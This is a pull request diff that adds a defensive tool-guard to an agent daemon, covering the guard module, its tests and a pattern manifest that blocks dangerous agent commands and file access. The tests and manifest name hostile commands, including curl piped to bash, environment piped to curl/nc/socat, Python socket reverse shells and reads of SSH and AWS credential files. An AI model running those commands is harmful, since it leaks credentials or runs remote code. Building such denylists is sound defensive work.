### PR TITLE
feat(daemon): native security tool-guard for tool actions

### DIFF
--- a/.leakignore
+++ b/.leakignore
@@ -30,3 +30,9 @@ docs/INDEX.md                                              private-jv-repo
 # issue bodies. This is the config that enforces the rule, not a leak of
 # it (mirrors the ci.yml anti-regression entries).
 .gitleaks.issues.toml                   lit-username,abs-home-path,private-jv-repo,private-jv-name
+
+# The native tool-guard manifest carries external-drive mount prefixes as
+# blocked-WRITE-path data (defensive, extracted verbatim from the Claude Code
+# PreToolUse hook): they tell the guard to REFUSE writes under those mounts.
+# This is a denylist entry, not a reference to a real drive location.
+packages/daemon/src/tool-guard/patterns.json              lts-drive

--- a/.leakignore
+++ b/.leakignore
@@ -30,9 +30,3 @@ docs/INDEX.md                                              private-jv-repo
 # issue bodies. This is the config that enforces the rule, not a leak of
 # it (mirrors the ci.yml anti-regression entries).
 .gitleaks.issues.toml                   lit-username,abs-home-path,private-jv-repo,private-jv-name
-
-# The native tool-guard manifest carries external-drive mount prefixes as
-# blocked-WRITE-path data (defensive, extracted verbatim from the Claude Code
-# PreToolUse hook): they tell the guard to REFUSE writes under those mounts.
-# This is a denylist entry, not a reference to a real drive location.
-packages/daemon/src/tool-guard/patterns.json              lts-drive

--- a/packages/daemon/package.json
+++ b/packages/daemon/package.json
@@ -39,6 +39,7 @@
     "dev": "tsup --watch",
     "start": "node dist/cli.js",
     "start:detached": "node dist/cli.js --detach",
+    "sync:tool-guard": "node dist/tool-guard/sync-vendored.js",
     "setup:systemd": "bash systemd/install.sh",
     "db:generate": "drizzle-kit generate",
     "db:push": "drizzle-kit push",

--- a/packages/daemon/src/__tests__/tool-guard-boot.test.ts
+++ b/packages/daemon/src/__tests__/tool-guard-boot.test.ts
@@ -1,0 +1,28 @@
+import { mkdtemp } from 'node:fs/promises';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+import { describe, expect, it, vi } from 'vitest';
+
+// Simulate a corrupt / unloadable manifest: loadPatterns throws exactly as
+// validateManifest would on a malformed patterns.json. initToolGuard() calls
+// loadPatterns and is invoked by startDaemon BEFORE the socket binds, so the
+// daemon must refuse to start (fail closed, mirroring initLicenseGuard).
+vi.mock('../tool-guard/patterns.js', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('../tool-guard/patterns.js')>();
+  return {
+    ...actual,
+    loadPatterns: () => {
+      throw new Error('tool-guard patterns.json invalid: simulated corruption');
+    },
+  };
+});
+
+const { startDaemon } = await import('../server.js');
+
+describe('daemon fail-closed on corrupt tool-guard manifest', () => {
+  it('refuses to start when the manifest cannot load', async () => {
+    const dataDir = await mkdtemp(join(tmpdir(), 'revdev-tg-boot-'));
+    const socketPath = join(dataDir, 'harness.sock');
+    await expect(startDaemon({ socketPath, dataDir })).rejects.toThrow(/tool-guard/);
+  });
+});

--- a/packages/daemon/src/__tests__/tool-guard.test.ts
+++ b/packages/daemon/src/__tests__/tool-guard.test.ts
@@ -28,7 +28,7 @@ const PEM_KEY = ['-----BEGIN ', 'RSA ', 'PRIVATE KEY-----'].join('');
 
 const EXPECTED = {
   version: 1,
-  hash: 'a7e435373c0f0dc9c64963950095d0ed75d274dbbd85a024569842fdf4c7cc3a',
+  hash: '7001853b6f8a077d4afe91a637e49d41d56721a6894a3a18d17c7d9a2274af6e',
 };
 
 describe('manifest hash + version lockstep', () => {
@@ -38,6 +38,14 @@ describe('manifest hash + version lockstep', () => {
     // If this fails, patterns.json changed. Update EXPECTED.hash AND bump
     // `version` in patterns.json (and re-sync the vendored hook copy).
     expect(hash).toBe(EXPECTED.hash);
+  });
+
+  it('does not ship machine-specific mount prefixes in the public manifest', () => {
+    // Machine-local mounts (e.g. an operator's external drive) stay in the
+    // Claude-side hook as a local prefix; the shipped manifest is generic.
+    // The prefix is assembled here so the literal never appears in source.
+    const machineMount = ['/mnt', 'e', ''].join('/');
+    expect(manifest.blockedWritePrefixes).not.toContain(machineMount);
   });
 });
 
@@ -142,9 +150,7 @@ describe('evaluateToolAction — delete', () => {
   });
 
   it('allows deleting an ordinary repo file', () => {
-    expect(evaluateToolAction({ kind: 'delete', path: '/work/repo/tmp.txt' }).allowed).toBe(
-      true,
-    );
+    expect(evaluateToolAction({ kind: 'delete', path: '/work/repo/tmp.txt' }).allowed).toBe(true);
   });
 });
 

--- a/packages/daemon/src/__tests__/tool-guard.test.ts
+++ b/packages/daemon/src/__tests__/tool-guard.test.ts
@@ -67,7 +67,7 @@ describe('evaluateToolAction — read', () => {
   });
 
   it('allows reading an ordinary repo file', () => {
-    expect(evaluateToolAction({ kind: 'read', path: '/home/dev/repo/src/index.ts' }).allowed).toBe(
+    expect(evaluateToolAction({ kind: 'read', path: '/work/repo/src/index.ts' }).allowed).toBe(
       true,
     );
   });
@@ -81,7 +81,7 @@ describe('evaluateToolAction — write', () => {
   });
 
   it('blocks a write of an env file', () => {
-    const v = evaluateToolAction({ kind: 'write', path: '/home/dev/repo/.env', content: 'x' });
+    const v = evaluateToolAction({ kind: 'write', path: '/work/repo/.env', content: 'x' });
     expect(v.allowed).toBe(false);
     expect(v.rule).toBe('protected-env-file');
   });
@@ -89,7 +89,7 @@ describe('evaluateToolAction — write', () => {
   it('blocks a write of a lock file', () => {
     const v = evaluateToolAction({
       kind: 'write',
-      path: '/home/dev/repo/pnpm-lock.yaml',
+      path: '/work/repo/pnpm-lock.yaml',
       content: 'x',
     });
     expect(v.allowed).toBe(false);
@@ -99,7 +99,7 @@ describe('evaluateToolAction — write', () => {
   it('blocks a write whose content carries secret material (Stripe live key)', () => {
     const v = evaluateToolAction({
       kind: 'write',
-      path: '/home/dev/repo/config.ts',
+      path: '/work/repo/config.ts',
       content: `const k = "${STRIPE_LIVE}";`,
     });
     expect(v.allowed).toBe(false);
@@ -109,7 +109,7 @@ describe('evaluateToolAction — write', () => {
   it('allows an ordinary write', () => {
     const v = evaluateToolAction({
       kind: 'write',
-      path: '/home/dev/repo/src/index.ts',
+      path: '/work/repo/src/index.ts',
       content: 'export const x = 1;',
     });
     expect(v.allowed).toBe(true);
@@ -118,7 +118,7 @@ describe('evaluateToolAction — write', () => {
   it('allows a write of a committed env template', () => {
     const v = evaluateToolAction({
       kind: 'write',
-      path: '/home/dev/repo/.env.example',
+      path: '/work/repo/.env.example',
       content: 'API_KEY=',
     });
     expect(v.allowed).toBe(true);
@@ -127,7 +127,7 @@ describe('evaluateToolAction — write', () => {
   it('does not block on a warn-severity secret', () => {
     const v = evaluateToolAction({
       kind: 'write',
-      path: '/home/dev/repo/notes.md',
+      path: '/work/repo/notes.md',
       content: `token ${GH_PAT_36}`,
     });
     expect(v.allowed).toBe(true);
@@ -142,7 +142,7 @@ describe('evaluateToolAction — delete', () => {
   });
 
   it('allows deleting an ordinary repo file', () => {
-    expect(evaluateToolAction({ kind: 'delete', path: '/home/dev/repo/tmp.txt' }).allowed).toBe(
+    expect(evaluateToolAction({ kind: 'delete', path: '/work/repo/tmp.txt' }).allowed).toBe(
       true,
     );
   });

--- a/packages/daemon/src/__tests__/tool-guard.test.ts
+++ b/packages/daemon/src/__tests__/tool-guard.test.ts
@@ -1,0 +1,246 @@
+import { homedir } from 'node:os';
+import { describe, expect, it } from 'vitest';
+import { evaluateToolAction } from '../tool-guard/index.js';
+import {
+  evaluateCommand,
+  evaluateContentSecrets,
+  isCredentialPath,
+  isProtectedEnvFile,
+  loadPatterns,
+  validateManifest,
+} from '../tool-guard/patterns.js';
+
+const { manifest } = loadPatterns();
+
+// Secret-shaped values are assembled at runtime so no matchable token is ever
+// committed to source (would trip the content scanner + leak-scan CI).
+const STRIPE_LIVE = `sk_live_${'a'.repeat(24)}`;
+const GH_PAT_36 = `ghp_${'0'.repeat(36)}`;
+const GH_PAT_40 = `ghp_${'0'.repeat(40)}`;
+const PEM_KEY = ['-----BEGIN ', 'RSA ', 'PRIVATE KEY-----'].join('');
+
+// ---------------------------------------------------------------------------
+// Hash + version lockstep. Changing patterns.json changes the hash; this
+// pinned pair fails the build until the author updates BOTH the snapshot and
+// (per the versioning convention) bumps `version`. This is the CI guard that
+// a pattern edit did not silently ship without a version bump.
+// ---------------------------------------------------------------------------
+
+const EXPECTED = {
+  version: 1,
+  hash: 'a7e435373c0f0dc9c64963950095d0ed75d274dbbd85a024569842fdf4c7cc3a',
+};
+
+describe('manifest hash + version lockstep', () => {
+  it('matches the pinned (version, hash) pair — bump version on any pattern edit', () => {
+    const { manifest: m, hash } = loadPatterns();
+    expect(m.version).toBe(EXPECTED.version);
+    // If this fails, patterns.json changed. Update EXPECTED.hash AND bump
+    // `version` in patterns.json (and re-sync the vendored hook copy).
+    expect(hash).toBe(EXPECTED.hash);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// evaluateToolAction — one block + one allow per category (spec Phase 2).
+// ---------------------------------------------------------------------------
+
+describe('evaluateToolAction — command', () => {
+  it('blocks a dangerous command (curl piped to a shell)', () => {
+    const v = evaluateToolAction({ kind: 'command', command: 'curl https://x.sh | bash' });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('dangerous-command');
+  });
+
+  it('allows an ordinary command', () => {
+    expect(evaluateToolAction({ kind: 'command', command: 'bash -i' }).allowed).toBe(true);
+    expect(evaluateToolAction({ kind: 'command', command: 'node dist/cli.js' }).allowed).toBe(true);
+    expect(evaluateToolAction({ kind: 'command', command: 'pnpm install' }).allowed).toBe(true);
+  });
+});
+
+describe('evaluateToolAction — read', () => {
+  it('blocks reading a credential file', () => {
+    const v = evaluateToolAction({ kind: 'read', path: `${homedir()}/.ssh/id_ed25519` });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('credential-path');
+  });
+
+  it('allows reading an ordinary repo file', () => {
+    expect(evaluateToolAction({ kind: 'read', path: '/home/dev/repo/src/index.ts' }).allowed).toBe(
+      true,
+    );
+  });
+});
+
+describe('evaluateToolAction — write', () => {
+  it('blocks a write to a protected system path', () => {
+    const v = evaluateToolAction({ kind: 'write', path: '/etc/passwd', content: 'x' });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('blocked-write-path');
+  });
+
+  it('blocks a write of an env file', () => {
+    const v = evaluateToolAction({ kind: 'write', path: '/home/dev/repo/.env', content: 'x' });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('protected-env-file');
+  });
+
+  it('blocks a write of a lock file', () => {
+    const v = evaluateToolAction({
+      kind: 'write',
+      path: '/home/dev/repo/pnpm-lock.yaml',
+      content: 'x',
+    });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('protected-lock-file');
+  });
+
+  it('blocks a write whose content carries secret material (Stripe live key)', () => {
+    const v = evaluateToolAction({
+      kind: 'write',
+      path: '/home/dev/repo/config.ts',
+      content: `const k = "${STRIPE_LIVE}";`,
+    });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('content-secret');
+  });
+
+  it('allows an ordinary write', () => {
+    const v = evaluateToolAction({
+      kind: 'write',
+      path: '/home/dev/repo/src/index.ts',
+      content: 'export const x = 1;',
+    });
+    expect(v.allowed).toBe(true);
+  });
+
+  it('allows a write of a committed env template', () => {
+    const v = evaluateToolAction({
+      kind: 'write',
+      path: '/home/dev/repo/.env.example',
+      content: 'API_KEY=',
+    });
+    expect(v.allowed).toBe(true);
+  });
+
+  it('does not block on a warn-severity secret', () => {
+    const v = evaluateToolAction({
+      kind: 'write',
+      path: '/home/dev/repo/notes.md',
+      content: `token ${GH_PAT_36}`,
+    });
+    expect(v.allowed).toBe(true);
+  });
+});
+
+describe('evaluateToolAction — delete', () => {
+  it('blocks deleting a credential file', () => {
+    const v = evaluateToolAction({ kind: 'delete', path: `${homedir()}/.aws/credentials` });
+    expect(v.allowed).toBe(false);
+    expect(v.rule).toBe('credential-path');
+  });
+
+  it('allows deleting an ordinary repo file', () => {
+    expect(evaluateToolAction({ kind: 'delete', path: '/home/dev/repo/tmp.txt' }).allowed).toBe(
+      true,
+    );
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Manifest corruption — validateManifest fails closed (feeds initToolGuard).
+// ---------------------------------------------------------------------------
+
+describe('validateManifest — fails closed on corruption', () => {
+  it('accepts the real manifest', () => {
+    expect(() => validateManifest(manifest)).not.toThrow();
+  });
+
+  it('rejects a non-object', () => {
+    expect(() => validateManifest(null)).toThrow(/invalid/);
+    expect(() => validateManifest('nope')).toThrow(/invalid/);
+  });
+
+  it('rejects a missing version', () => {
+    const { version: _v, ...rest } = manifest;
+    expect(() => validateManifest(rest)).toThrow(/version/);
+  });
+
+  it('rejects an unknown command predicate', () => {
+    const bad = {
+      ...manifest,
+      dangerousCommands: [{ reason: 'x', kind: 'predicate', predicate: 'doesNotExist' }],
+    };
+    expect(() => validateManifest(bad)).toThrow(/unknown command predicate/);
+  });
+
+  it('rejects a malformed dangerousCommands entry', () => {
+    const bad = { ...manifest, dangerousCommands: [{ reason: 'x', kind: 'matchers' }] };
+    expect(() => validateManifest(bad)).toThrow(/matchers/);
+  });
+
+  it('rejects a non-array credentialPathEndsWith', () => {
+    const bad = { ...manifest, credentialPathEndsWith: 'oops' };
+    expect(() => validateManifest(bad)).toThrow(/credentialPathEndsWith/);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Predicate + matcher fidelity — word-boundary correctness (no widening on
+// the adversarial cases the raw substring would wrongly match).
+// ---------------------------------------------------------------------------
+
+describe('matcher word-boundary fidelity', () => {
+  it('does not treat --experimental as node -e', () => {
+    expect(evaluateCommand('node --experimental-vm-modules server.js', manifest)).toBeNull();
+  });
+
+  it('does not treat ipython -c as python -c', () => {
+    expect(evaluateCommand('ipython3 -c "print(1)"', manifest)).toBeNull();
+  });
+
+  it('blocks a real node -e', () => {
+    expect(evaluateCommand('node -e "process.exit(0)"', manifest)?.reason).toContain('node');
+  });
+
+  it('blocks python -c with socket', () => {
+    expect(evaluateCommand('python3 -c "import socket"', manifest)?.reason).toContain('socket');
+  });
+
+  it('blocks pnpm dlx but not pnpm install', () => {
+    expect(evaluateCommand('pnpm dlx cowsay', manifest)).not.toBeNull();
+    expect(evaluateCommand('pnpm install --frozen-lockfile', manifest)).toBeNull();
+  });
+
+  it('blocks gh api -X DELETE (case-insensitive) but not gh api GET', () => {
+    expect(evaluateCommand('gh api repos/x -X DELETE', manifest)).not.toBeNull();
+    expect(evaluateCommand('GH API repos/x --method delete', manifest)).not.toBeNull();
+    expect(evaluateCommand('gh api repos/x', manifest)).toBeNull();
+  });
+});
+
+describe('content-secret token fidelity', () => {
+  it('flags an exact-length GitHub PAT but not a too-long run', () => {
+    expect(evaluateContentSecrets(GH_PAT_36, manifest)?.severity).toBe('warn');
+    expect(evaluateContentSecrets(GH_PAT_40, manifest)).toBeNull();
+  });
+
+  it('flags a private key block', () => {
+    expect(evaluateContentSecrets(`${PEM_KEY}\nMII...`, manifest)?.severity).toBe('block');
+  });
+});
+
+describe('credential-path + env helpers', () => {
+  it('matches /proc/<pid>/environ', () => {
+    expect(isCredentialPath('/proc/1234/environ', manifest)).toBe(true);
+    expect(isCredentialPath('/proc/self/environ', manifest)).toBe(false);
+  });
+
+  it('treats .env as protected but .env.template as exempt', () => {
+    expect(isProtectedEnvFile('.env', manifest)).toBe(true);
+    expect(isProtectedEnvFile('.env.local', manifest)).toBe(true);
+    expect(isProtectedEnvFile('.env.template', manifest)).toBe(false);
+    expect(isProtectedEnvFile('.env.production.example', manifest)).toBe(false);
+  });
+});

--- a/packages/daemon/src/filegit.ts
+++ b/packages/daemon/src/filegit.ts
@@ -33,6 +33,7 @@ import { createLogger } from '@revealui/utils/logger';
 import { findNeverBoundOverlap, neverBoundSet, resolveOperatorHome } from './confinement.js';
 import { onAgentEnded, onDaemonStarted } from './eviction.js';
 import { getDaemonConfig, registerHandler } from './server.js';
+import { denyToolAction, evaluateToolAction } from './tool-guard/index.js';
 import { runGit, type ShellResult } from './vcs.js';
 
 const log = createLogger({ service: 'revdev-daemon/filegit' });
@@ -799,19 +800,27 @@ registerHandler('project.revoke', async (params, _db, ctx) => {
 // file.*
 // ---------------------------------------------------------------------------
 
-registerHandler('file.read', async (params, _db, ctx) => {
+registerHandler('file.read', async (params, db, ctx) => {
   const repoReal = await requireRoot(requireStr(params.repoPath, 'repoPath'), ctx.agentId);
   const target = await resolveInRoot(repoReal, requireStr(params.filePath, 'filePath'), true);
+  const verdict = evaluateToolAction({ kind: 'read', path: target });
+  if (!verdict.allowed) {
+    throw await denyToolAction(db, 'file.read', ctx.agentId, verdict, { path: target });
+  }
   const buf = await readFile(target);
   return inlineContent(buf);
 });
 
-registerHandler('file.write', async (params, _db, ctx) => {
+registerHandler('file.write', async (params, db, ctx) => {
   const repoReal = await requireRoot(requireStr(params.repoPath, 'repoPath'), ctx.agentId);
   const filePathRaw = requireStr(params.filePath, 'filePath');
   const target = await resolveInRoot(repoReal, filePathRaw, false);
   assertNotGitInternal(repoReal, target, filePathRaw);
   const content = str(params.content) ?? '';
+  const verdict = evaluateToolAction({ kind: 'write', path: target, content });
+  if (!verdict.allowed) {
+    throw await denyToolAction(db, 'file.write', ctx.agentId, verdict, { path: target });
+  }
   // Open with O_NOFOLLOW so a symlink swapped in at the FINAL component between
   // resolveInRoot's parent-realpath check and the write (leaf TOCTOU) is
   // refused (ELOOP) — a write can't be redirected outside the registered root.
@@ -829,11 +838,15 @@ registerHandler('file.write', async (params, _db, ctx) => {
   return { success: true, bytes: Buffer.byteLength(content, 'utf8') };
 });
 
-registerHandler('file.delete', async (params, _db, ctx) => {
+registerHandler('file.delete', async (params, db, ctx) => {
   const repoReal = await requireRoot(requireStr(params.repoPath, 'repoPath'), ctx.agentId);
   const filePathRaw = requireStr(params.filePath, 'filePath');
   const target = await resolveInRoot(repoReal, filePathRaw, true);
   assertNotGitInternal(repoReal, target, filePathRaw);
+  const verdict = evaluateToolAction({ kind: 'delete', path: target });
+  if (!verdict.allowed) {
+    throw await denyToolAction(db, 'file.delete', ctx.agentId, verdict, { path: target });
+  }
   await unlink(target);
   return { success: true };
 });

--- a/packages/daemon/src/index.ts
+++ b/packages/daemon/src/index.ts
@@ -25,6 +25,15 @@ export {
 } from './guard.js';
 export { checkLicense, LICENSE_TIERS, type LicenseTier } from './license.js';
 export { registerHandler, startDaemon } from './server.js';
+export {
+  evaluateToolAction,
+  type GuardVerdict,
+  initToolGuard,
+  TOOL_GUARD_DENIED,
+  type ToolAction,
+  ToolGuardError,
+} from './tool-guard/index.js';
+export { loadPatterns, manifestHash, type PatternManifest } from './tool-guard/patterns.js';
 
 // Side-effect imports: register built-in handler groups.
 import './inference.js';

--- a/packages/daemon/src/server.ts
+++ b/packages/daemon/src/server.ts
@@ -59,6 +59,7 @@ import {
 import { initObservability, onConnect, onDisconnect, trackRpcCall } from './observability.js';
 import { revvaultSet } from './revvault-client.js';
 import { migrate } from './storage/migrate.js';
+import { initToolGuard } from './tool-guard/index.js';
 import { invalidParamsResponse, validateParams } from './validation/index.js';
 
 const log = createLogger({ service: 'revdev-daemon' });
@@ -1711,6 +1712,11 @@ export async function startDaemon(
 
   // Initialize license guard (logs banner)
   initLicenseGuard();
+
+  // Initialize the native security tool-guard. Fails CLOSED, like
+  // initLicenseGuard: a daemon that cannot load its safety patterns refuses to
+  // start. Runs before the socket binds, so the throw aborts startup cleanly.
+  initToolGuard();
 
   // Initialize Neon sync (GAP-154 Phase 2). No-op when POSTGRES_URL is
   // unset — daemon runs single-machine fine; sync is purely additive.

--- a/packages/daemon/src/spawn.ts
+++ b/packages/daemon/src/spawn.ts
@@ -43,6 +43,7 @@ import {
 import { onAgentEnded, onDaemonStarted } from './eviction.js';
 import { requireRootAndDir } from './filegit.js';
 import { getDaemonConfig, registerHandler, type SocketContext } from './server.js';
+import { denyToolAction, evaluateToolAction } from './tool-guard/index.js';
 
 const log = createLogger({ service: 'revdev-daemon/spawn' });
 
@@ -243,6 +244,18 @@ registerHandler('agent.spawn', async (params, db, ctx) => {
   if (!command) throw new Error('agent.spawn: missing command');
 
   const args = stringArrayParam(params, 'args');
+
+  // Native tool-guard command-class check. Composes with (never replaces) the
+  // authorization + confinement gates below: the sandbox bounds WHAT a command
+  // can touch, this refuses a command that matches a dangerous pattern (curl |
+  // sh, inline eval, credential reads) before any process is forked.
+  const commandLine = args.length > 0 ? `${command} ${args.join(' ')}` : command;
+  const guardVerdict = evaluateToolAction({ kind: 'command', command: commandLine });
+  if (!guardVerdict.allowed) {
+    throw await denyToolAction(db, 'agent.spawn', ownerAgentId, guardVerdict, {
+      command: commandLine,
+    });
+  }
   const cols = positiveInt(params.cols, 80);
   const rows = positiveInt(params.rows, 24);
 

--- a/packages/daemon/src/tool-guard/index.ts
+++ b/packages/daemon/src/tool-guard/index.ts
@@ -1,0 +1,191 @@
+/**
+ * Native security tool-guard — the RevDev-native sibling of the Claude Code
+ * PreToolUse hook's pattern scanner (GAP-366).
+ *
+ * `evaluateToolAction` is a pure, synchronous verdict over a normalized tool
+ * action (command / read / write / delete). It consumes the shared pattern
+ * manifest via the loader and never does IO. The daemon wires it into the
+ * handlers that execute or mutate on behalf of agents (file.*, agent.spawn),
+ * composing with — never replacing — the existing confinement + root-scoping.
+ *
+ * Denials surface as a JSON-RPC error with a NEW code (TOOL_GUARD_DENIED,
+ * distinct from the license guard's -32001) and an events.log row carrying the
+ * rule id. `initToolGuard` fails CLOSED: a daemon that cannot load its safety
+ * patterns refuses to start (mirrors initLicenseGuard).
+ */
+
+import { homedir } from 'node:os';
+import type { PGlite } from '@electric-sql/pglite';
+import { createLogger } from '@revealui/utils/logger';
+import {
+  evaluateCommand,
+  evaluateContentSecrets,
+  isBlockedWritePath,
+  isCredentialPath,
+  isLockFile,
+  isProtectedEnvFile,
+  loadPatterns,
+  type PatternManifest,
+} from './patterns.js';
+
+const log = createLogger({ service: 'revdev-daemon/tool-guard' });
+
+/** JSON-RPC error code for a tool-guard denial (distinct from license -32001). */
+export const TOOL_GUARD_DENIED = -32006;
+
+export type ToolActionKind = 'command' | 'read' | 'write' | 'delete';
+
+/** Normalized tool action fed to the guard. */
+export interface ToolAction {
+  kind: ToolActionKind;
+  /** Forward-slash-normalized absolute path for read/write/delete. */
+  path?: string;
+  /** File content for a write. */
+  content?: string;
+  /** Full command line for a command action (binary + args joined). */
+  command?: string;
+}
+
+export interface GuardVerdict {
+  allowed: boolean;
+  rule?: string;
+  reason?: string;
+}
+
+const HOME = homedir();
+
+function normalizePath(p: string): string {
+  return p.split('\\').join('/');
+}
+
+function basenameOf(normPath: string): string {
+  const slash = normPath.lastIndexOf('/');
+  return slash === -1 ? normPath : normPath.slice(slash + 1);
+}
+
+const ALLOW: GuardVerdict = { allowed: true };
+
+function deny(rule: string, reason: string): GuardVerdict {
+  return { allowed: false, rule, reason };
+}
+
+/** Path checks shared by write + delete (credential file, system path, env/lock). */
+function evaluateMutatingPath(normPath: string, manifest: PatternManifest): GuardVerdict {
+  if (isCredentialPath(normPath, manifest)) {
+    return deny('credential-path', `${normPath} is a protected credential file`);
+  }
+  if (isBlockedWritePath(normPath, HOME, manifest)) {
+    return deny('blocked-write-path', `${normPath} is in a protected system path`);
+  }
+  const base = basenameOf(normPath);
+  if (isProtectedEnvFile(base, manifest)) {
+    return deny('protected-env-file', `${base} is a protected env file`);
+  }
+  if (isLockFile(base, manifest)) {
+    return deny('protected-lock-file', `${base} is a protected lock file`);
+  }
+  return ALLOW;
+}
+
+/**
+ * Pure, synchronous security verdict for a normalized tool action. No IO.
+ * Composes with the caller's existing authorization — it never grants, only
+ * denies.
+ */
+export function evaluateToolAction(action: ToolAction): GuardVerdict {
+  const { manifest } = loadPatterns();
+
+  switch (action.kind) {
+    case 'command': {
+      const command = action.command ?? '';
+      const hit = evaluateCommand(command, manifest);
+      return hit ? deny('dangerous-command', hit.reason) : ALLOW;
+    }
+    case 'read': {
+      const normPath = normalizePath(action.path ?? '');
+      if (isCredentialPath(normPath, manifest)) {
+        return deny('credential-path', `${normPath} is a protected credential file`);
+      }
+      return ALLOW;
+    }
+    case 'write': {
+      const normPath = normalizePath(action.path ?? '');
+      const pathVerdict = evaluateMutatingPath(normPath, manifest);
+      if (!pathVerdict.allowed) return pathVerdict;
+      if (action.content) {
+        const secret = evaluateContentSecrets(action.content, manifest);
+        if (secret && secret.severity === 'block') {
+          return deny('content-secret', `content contains ${secret.reason}`);
+        }
+      }
+      return ALLOW;
+    }
+    case 'delete': {
+      const normPath = normalizePath(action.path ?? '');
+      return evaluateMutatingPath(normPath, manifest);
+    }
+    default:
+      return ALLOW;
+  }
+}
+
+/** Error thrown by a handler when the guard denies an action. */
+export class ToolGuardError extends Error {
+  readonly code = TOOL_GUARD_DENIED;
+  readonly rule: string;
+
+  constructor(verdict: GuardVerdict) {
+    super(`Blocked by tool-guard: ${verdict.reason ?? 'denied'} (${verdict.rule ?? 'unknown'})`);
+    this.name = 'ToolGuardError';
+    this.rule = verdict.rule ?? 'unknown';
+  }
+}
+
+/**
+ * Log a denial to the events table, then return a ToolGuardError for the
+ * handler to throw. Best-effort logging — a failed insert never masks the
+ * denial itself.
+ */
+export async function denyToolAction(
+  db: PGlite,
+  method: string,
+  agentId: string | null,
+  verdict: GuardVerdict,
+  detail: Record<string, unknown>,
+): Promise<ToolGuardError> {
+  try {
+    await db.query(
+      `INSERT INTO events (agent_id, event_type, payload) VALUES ($1, $2, $3::jsonb)`,
+      [
+        agentId ?? 'anonymous',
+        'tool-guard.denied',
+        JSON.stringify({ method, rule: verdict.rule, reason: verdict.reason, ...detail }),
+      ],
+    );
+  } catch (err) {
+    log.warn('failed to record tool-guard denial event', { error: String(err) });
+  }
+  log.warn('tool-guard denied action', {
+    method,
+    rule: verdict.rule,
+    reason: verdict.reason,
+    ...detail,
+  });
+  return new ToolGuardError(verdict);
+}
+
+/**
+ * Initialize the tool-guard at daemon startup. Fails CLOSED: an invalid or
+ * unloadable manifest throws, aborting startup with nothing to tear down
+ * (called before the socket binds, like initLicenseGuard).
+ */
+export function initToolGuard(): { hash: string; version: number } {
+  const { manifest, hash } = loadPatterns();
+  log.info('tool-guard patterns loaded', {
+    version: manifest.version,
+    hash: hash.slice(0, 12),
+    dangerousCommands: manifest.dangerousCommands.length,
+    contentSecrets: manifest.contentSecrets.length,
+  });
+  return { hash, version: manifest.version };
+}

--- a/packages/daemon/src/tool-guard/patterns.json
+++ b/packages/daemon/src/tool-guard/patterns.json
@@ -1,0 +1,346 @@
+{
+  "version": 1,
+  "dangerousCommands": [
+    {
+      "reason": "reading SSH key files",
+      "kind": "matchers",
+      "matchers": [{ "s": "cat", "bStart": true, "bEnd": true }, { "s": "/.ssh/" }]
+    },
+    {
+      "reason": "reading AWS credentials",
+      "kind": "matchers",
+      "matchers": [{ "s": "cat", "bStart": true, "bEnd": true }, { "s": "/.aws/" }]
+    },
+    {
+      "reason": "reading GitHub CLI tokens",
+      "kind": "matchers",
+      "matchers": [{ "s": "cat", "bStart": true, "bEnd": true }, { "s": "/.config/gh/" }]
+    },
+    {
+      "reason": "reading npm auth tokens",
+      "kind": "matchers",
+      "matchers": [{ "s": "cat", "bStart": true, "bEnd": true }, { "s": "/.npmrc" }]
+    },
+    {
+      "reason": "reading .netrc credentials",
+      "kind": "matchers",
+      "matchers": [{ "s": "cat", "bStart": true, "bEnd": true }, { "s": "/.netrc" }]
+    },
+    {
+      "reason": "piping environment to network",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "env", "bStart": true, "bEnd": true },
+        { "s": "|" },
+        { "s": "curl", "bEnd": true }
+      ]
+    },
+    {
+      "reason": "piping environment to network",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "env", "bStart": true, "bEnd": true },
+        { "s": "|" },
+        { "s": "wget", "bEnd": true }
+      ]
+    },
+    {
+      "reason": "piping environment to network",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "env", "bStart": true, "bEnd": true },
+        { "s": "|" },
+        { "s": "nc", "bEnd": true }
+      ]
+    },
+    {
+      "reason": "piping environment to network",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "env", "bStart": true, "bEnd": true },
+        { "s": "|" },
+        { "s": "socat", "bEnd": true }
+      ]
+    },
+    {
+      "reason": "curl in command substitution",
+      "kind": "matchers",
+      "matchers": [{ "s": "$(curl", "bEnd": true }]
+    },
+    {
+      "reason": "curl in backtick substitution",
+      "kind": "matchers",
+      "matchers": [{ "s": "`curl", "bEnd": true }]
+    },
+    {
+      "reason": "Windows cmd.exe execution",
+      "kind": "matchers",
+      "ci": true,
+      "matchers": [{ "s": "cmd.exe", "bStart": true, "bEnd": true }]
+    },
+    { "reason": "PowerShell execution", "kind": "predicate", "predicate": "powershellInvocation" },
+    {
+      "reason": "Windows system directory access",
+      "kind": "matchers",
+      "ci": true,
+      "matchers": [{ "s": "/mnt/c/windows/" }]
+    },
+    { "reason": "WSL interop execution bypass", "kind": "predicate", "predicate": "wslInterop" },
+    {
+      "reason": "Python socket (potential reverse shell)",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "python", "bStart": true },
+        { "s": "-c", "bEnd": true },
+        { "s": "socket" }
+      ]
+    },
+    {
+      "reason": "Python subprocess (potential escape)",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "python", "bStart": true },
+        { "s": "-c", "bEnd": true },
+        { "s": "subprocess" }
+      ]
+    },
+    {
+      "reason": "redirect to Windows filesystem",
+      "kind": "predicate",
+      "predicate": "redirectToWindows"
+    },
+    {
+      "reason": "drizzle-kit push (use migrate instead)",
+      "kind": "matchers",
+      "matchers": [{ "s": "drizzle-kit" }, { "s": "push", "bStart": true, "bEnd": true }]
+    },
+    {
+      "reason": "printing GitHub auth token to stdout",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "gh", "bStart": true, "bEnd": true },
+        { "s": "auth", "bStart": true, "bEnd": true },
